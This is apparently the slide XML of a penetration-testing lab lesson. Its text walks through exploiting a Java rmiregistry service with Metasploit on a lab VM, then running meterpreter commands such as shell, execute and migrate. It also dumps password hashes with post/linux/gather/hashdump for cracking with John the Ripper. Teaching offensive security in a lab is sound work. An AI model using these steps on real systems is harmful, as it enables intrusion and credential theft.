                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> in without any password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> root@10.10.0.20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック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70C209E-2708-4441-AC9E-E076EA66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05" y="1972248"/>
            <a:ext cx="4395968" cy="29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47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Java Vulnerability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Check out the port service list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Classpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is a collection of tools to support Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://www.gnu.org/software/classpath/cp-tools/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There is a service associated with this that is running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Identify it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Find the service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Research it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Learn about what the vulnerabilities may be (versions, misconfigurations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploit it and use meterpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>command </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Try advanced search features such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>type:exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>platform:linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>name:????</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1896559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2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225FE-05C5-4823-BED3-20FCA4D07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83F61-2F81-4493-8B28-86C6C127D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199" y="741954"/>
          <a:ext cx="8887641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885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25997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84184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262548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rmiregistry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GNU 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Classpath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grmiregistry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1099/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> - Java Vulnerability</a:t>
            </a:r>
          </a:p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D8ABDA0-EEA1-468C-BDC5-F637962E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200219"/>
            <a:ext cx="7475220" cy="35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2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199" y="741954"/>
          <a:ext cx="8887641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885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25997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84184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262548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rmiregistry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GNU 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Classpath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grmiregistry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1099/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> - Java Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p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10E2D70-B6D2-4F20-9C3F-22F2741E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1367401"/>
            <a:ext cx="7978140" cy="32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Kali Updates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/>
              <a:t>Before we disconnect Kali from the internet, update some software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>We will use it later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>apt update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>-client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4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8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1099/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> - Java Vulnerability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8179" y="989094"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Metasploit may need root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> to start the HTTP server for this exploit. Restart using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> if getting this error: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1800" dirty="0"/>
              <a:t>Sometimes we will get errors or exploits fail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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>But our session was still created!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="688975" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1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41087"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="128179" y="705249"/>
          <a:ext cx="8887641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885">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="773936621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1953351835"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="925997">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="787624731"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1484184">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1394581888"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5262548">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676489178"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="840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rmiregistry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GNU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Classpath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grmiregistry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017527"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5715245-A97A-4F08-95C8-AC681CD0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0" y="2693920"/>
            <a:ext cx="4321296" cy="96636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D24003-B6E1-4B4B-9827-7A2540E0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0" y="3983484"/>
            <a:ext cx="4054322" cy="106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37299-9090-4916-8B42-DDDD189DC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0" y="1513135"/>
            <a:ext cx="4075828" cy="8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3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Java Vulnerability - Meterpreter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Once we get meterpreter, let's try some basic commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Interact with the filesystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Current directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Change directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>cd root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>List directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can also just get a shell, bash in Linux or cmd.exe in Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If you try to do some basic terminal tools, like tab-completion, it will fail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Try to view a man page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Many issues with shell vs terminal access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>exit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40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Meterpreter</a:t>
            </a:r>
          </a:p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Get system or user into info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can also just get a shell, bash in Linux or cmd.exe in Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If you try to do some basic terminal tools, like tab-completion, it will fail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Try to view a man page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Many issues with shell vs terminal access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Get back to our meterpreter prompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can execute a command too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>execute -f [command] -a "[arguments]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Try pinging our Kali host and verify it with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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83B5340-FA55-4499-B2BD-CB8782ED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95" y="929012"/>
            <a:ext cx="2895116" cy="7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9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Meterpreter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 dirty="0"/>
              <a:t>In one window, start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> so we only see traffic from our target and also only ICMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> host 10.10.0.20 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the execute command from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>execute -f ping -a "-c 4 10.10.0.10"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D135B61-862A-4577-8E2C-1AE6B8E4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5" y="2630119"/>
            <a:ext cx="8646095" cy="16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Meterpreter - Processes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We can get a list of running processes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Arguments like -c will only show us the processes we created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Try it, we should see the ping process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can also use the process list to help us migrate to another more stable process, learn more with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> migrate -h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For other commands and information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> ?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3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Meterpreter - Post Exploitation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87381" y="744723"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Meterpreter also has lots of more post-exploitation functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We will cover these in another lesson</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For now, try</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can use these hashes and crack with john the ripper or other tools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E764BF9-6F43-4CF0-8672-BF84D2A6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76" y="2327526"/>
            <a:ext cx="7729571" cy="22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3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z="4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Closed Box Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="867080924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Closed Box Hacking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Using the same VM get a root prompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You already have performed recon and scanned the machine, some vulnerabilities identified and exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try some new scan tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install enum4linux-ng, next slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or review existing findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap or OpenVAS scans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version and Script Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research Vulns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72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6CFCD-4F0C-4158-9AA0-32432F339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Enum4linux-ng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0B44B3-6E83-41F1-9DC4-5EF21D7979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127" y="873577"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Install Enum4Linux-ng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/cddmp/enum4linux-ng</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/cddmp/enum4linux-ng</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>cd enum4linux-ng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To check for options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>enum4linux-ng –h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Basic Usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>enum4linux-ng &lt;options&gt; HOST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> usernames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
